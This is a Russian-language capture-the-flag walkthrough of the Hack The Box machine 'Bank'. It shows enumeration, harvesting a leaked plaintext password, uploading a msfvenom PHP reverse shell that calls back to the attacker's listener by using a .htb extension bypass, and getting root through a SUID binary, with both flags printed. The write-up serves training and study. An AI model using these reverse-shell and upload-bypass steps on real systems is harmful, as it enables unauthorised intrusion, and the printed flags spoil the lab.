Обзор сервисов
IP-адрес машины 10.10.10.29. Стандартный вывод nmap:
$ nmap -sC -sT -Pn -vvv -oN 10.10.10.29 10.10.10.29
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-26 13:32 EDT
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:32
Completed NSE at 13:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:32
Completed NSE at 13:32, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:32
Completed Parallel DNS resolution of 1 host. at 13:32, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:32
Scanning 10.10.10.29 [1000 ports]
Discovered open port 53/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 22/tcp on 10.10.10.29
Increasing send delay for 10.10.10.29 from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.10.29 from 5 to 10 due to 11 out of 33 dropped probes since last increase.
Completed Connect Scan at 13:32, 22.51s elapsed (1000 total ports)
NSE: Script scanning 10.10.10.29.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:32
Completed NSE at 13:33, 20.26s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Nmap scan report for 10.10.10.29
Host is up, received user-set (0.17s latency).
Scanned at 2023-07-26 13:32:25 EDT for 42s
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAMJ+YATka9wvs0FTz8iNWs6uCiLqSFhmBYoYAorFpozVGkCkU1aEJ7biybFTw/qzS9pbSsaYA+3LyUyvh3BSPGEt1BgGW/H29MuXjkznwVz60JqL4GqaJzYSL3smYYdr3KdJQI/QSvf34WU3pife6LRmJaVk+ETh3wPclyecNtedAAAAFQC1Zb2O2LzvAWf20FdsK8HRPlrx1wAAAIBIBAhLmVd3Tz+o+6Oz39g4Um1le8d3DETINWk3myRvPw8hcnRwAFe1+14h3RX4fr+LKXoR/tYrI138PJyiyl+YtQWhZnJ7j8lqnKRU2YibtnUc44kP9FhUqeAcBNjj4qwG9GyQSWm/Q5CbOokgaa6WfdcnwsUMim0h2Ad8YdU1kAAAAIBy3dOOD8jKHeBdE/oXGG0X9tKSFZv1gPr/kZ7NfqUF0kHU3oZTNK8/2qR0SNHgrZ2cLgKTIuneGS8lauXjC66NNMoUkJcMHpwRkYC0A86LDmhES6OuPsQwAjr1AtUZn97QjYu1d6WPfhTdsRYBuCotgKh2SBkzV1Bcz77Tnp56JA==
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc0rofjHtpSlqkDjjnkEiYcbUrMH0Q4a6PcxqsR3updDGBWu/RK7AGWRSjPn13uil/nl44XF/fkULy7FoXXskByLCHP8FS2gYJApQMvI9n81ERojEA0NIi6VZKP19bl1VFTk7Q5rEPIpab2xqYMBayb1ch7iP95n3iayvHEt/7cSTsddGWKeALi+rrujpnryNViiOIWpqDv+RWtbc2Wuc/FTeGSOt1LBTbtKcLwEehBG+Ym8o8iKTd+zfVudu7v1g3W2Aa3zLuTcePRKLUK3Q2D7k+5aJnWrekpiARQm3NmMkv1NuDLeW3amVBCv6DRJPBqEgSeGMGsnqkR8CKHO9/
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH30xnPq1XEub/UFQ2KoHXh9LFKMNMkt60xYF3OrEp1Y5XQd0QyeLXwm6tIqWtb0rWda/ivDgmiB4GzCIMf/HQ=
| 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA8MYjFyo+4OwYGTzeuyNd998y6cOx56mIuciim1cvKh
53/tcp open domain syn-ack
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http syn-ack
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-title: Apache2 Ubuntu Default Page: It works
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 43.05 seconds
Веб-интерфейс
Стандартный интерфейс Apache2 на главной.
На порту 53 имеется DNS, стоит проверить записи.
$ dig bank.htb @10.10.10.29
; <<>> DiG 9.18.16-1-Debian <<>> bank.htb @10.10.10.29
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<opcode: QUERY, status: NOERROR, id: 44574
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;bank.htb. IN A
;; ANSWER SECTION:
bank.htb. 604800 IN A 10.10.10.29
;; AUTHORITY SECTION:
bank.htb. 604800 IN NS ns.bank.htb.
;; ADDITIONAL SECTION:
ns.bank.htb. 604800 IN A 10.10.10.29
;; Query time: 56 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (UDP)
;; WHEN: Wed Jul 26 14:02:31 EDT 2023
;; MSG SIZE rcvd: 86
Занесем полученный записи в /etc/hosts:
$ sudo nano /etc/hosts
10.10.10.29 bank.htb ns.bank.htb
Поищем другие каталоги и файлы с расширением php:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://bank.htb -t 20 -x php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://bank.htb
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2023/07/26 14:07:00 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 7322] [--> login.php]
/login.php (Status: 200) [Size: 1974]
/support.php (Status: 302) [Size: 3291] [--> login.php]
/uploads (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/inc (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer (Status: 301) [Size: 304] [--> http://bank.htb/balance-transfer/]
Progress: 22035 / 175330 (12.57%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/07/26 14:08:28 Finished
===============================================================
Интересный каталог /inc/ содержит следующие файлы:
Каталог /balance-transfer/ содержит файлы *.acc.
Каждый файл выглядит как лог транзакции с зашифрованным содержимым.
Скачаем весь каталог, чтобы исследовать подробнее.
wget -r http://bank.htb/balance-transfer/
В каталоге есть файлы с разными размерами, но обычно это 581-585 байт. Среди них затесался файл размером 257 байт:
$ ls -la | grep acc | awk -F " " '{print $5}' | sort | uniq
257
581
582
583
584
585
$ ls -la | grep 257
-rw-r--r-- 1 user user 583 Jun 15 2017 29ee355c82a4bbe25787fc0b4d96dd45.acc
-rw-r--r-- 1 user user 585 Jun 15 2017 3e15fba8222b4257f517f73ffa6e8dbf.acc
-rw-r--r-- 1 user user 585 Jun 15 2017 500f59a56cf27362df6df66852574348.acc
-rw-r--r-- 1 user user 584 Jun 15 2017 5be5196a9bfbf55be5322576b6cf2ec0.acc
-rw-r--r-- 1 user user 257 Jun 15 2017 68576f20e9732f1b2edc4df5b8533230.acc
-rw-r--r-- 1 user user 584 Jun 15 2017 92579940417f9ae8d23f3274830ceeaa.acc
-rw-r--r-- 1 user user 584 Jun 15 2017 cbeed458cd121a5a971a2578ff6a3a95.acc
-rw-r--r-- 1 user user 584 Jun 15 2017 e1c22573a63c4b2a458b50fe5952dfbe.acc
-rw-r--r-- 1 user user 584 Jun 15 2017 e291abebd339260825783fb4c3a308ad.acc
Посмотрим внутрь такого файла:
$ cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
Используем креды [email protected]:!##HTBB4nkP4ssw0rd!## и логинимся в вебку.
На роуте /support.php можно создать обращение в поддержку и приложить файл. К сожалению, просто приложить PHP-шелл не выходит из-за проверок.
В коде оставлена заметка о том, что файлы с расширением htb выполняются как PHP-файлы.
$ msfvenom -p php/reverse_php LHOST=10.10.16.93 LPORT=4242 -f raw > shell.htb
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 2981 bytes
$ msfconsole
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 4242
lport => 4242
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.93:4242
Загрузка прошла успешно.
curl http://bank.htb/uploads/shell.htb
Пользовательский флаг
Нам достаточно прав, чтобы забрать флаг из каталога /home/chris
cd /home
ls -la
total 12
drwxr-xr-x 3 root root 4096 Jan 11 2021 .
drwxr-xr-x 22 root root 4096 Jan 11 2021 ..
drwxr-xr-x 3 chris chris 4096 Jan 11 2021 chris
cd chris
ls -la
total 28
drwxr-xr-x 3 chris chris 4096 Jan 11 2021 .
drwxr-xr-x 3 root root 4096 Jan 11 2021 ..
lrwxrwxrwx 1 root root 9 Jan 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 chris chris 220 May 28 2017 .bash_logout
-rw-r--r-- 1 chris chris 3637 May 28 2017 .bashrc
drwx------ 2 chris chris 4096 Jan 11 2021 .cache
-rw-r--r-- 1 chris chris 675 May 28 2017 .profile
-r--r--r-- 1 chris chris 33 Jul 26 19:27 user.txt
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cat user.txt
1089a56e67effacd223a5b6e127c8750
Повышение привилегий
Во время осмотра машины был найден файл /var/htb/bin/emergency с SUID флагом.
Простой вызов этого файла дает нам доступ к консоли суперпользователя.
/var/htb/bin/emergency
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root)(www-data)
Флаг суперпользователя
cd /root
ls -la
total 36
drwx------ 4 root root 4096 Jan 11 2021 .
drwxr-xr-x 22 root root 4096 Jan 11 2021 ..
lrwxrwxrwx 1 root root 9 Jan 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3110 May 30 2017 .bashrc
drwx------ 2 root root 4096 Jan 11 2021 .cache
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
drwxr-xr-x 2 root root 4096 Jan 11 2021 .rpmdb
-rw-r--r-- 1 root root 66 May 29 2017 .selected_editor
-rw------- 1 root root 598 Jan 11 2021 .viminfo
-r-------- 1 root root 33 Jul 26 19:27 root.txt
cat root.txt
296c5d5deda26ea30c10983b68144d7a
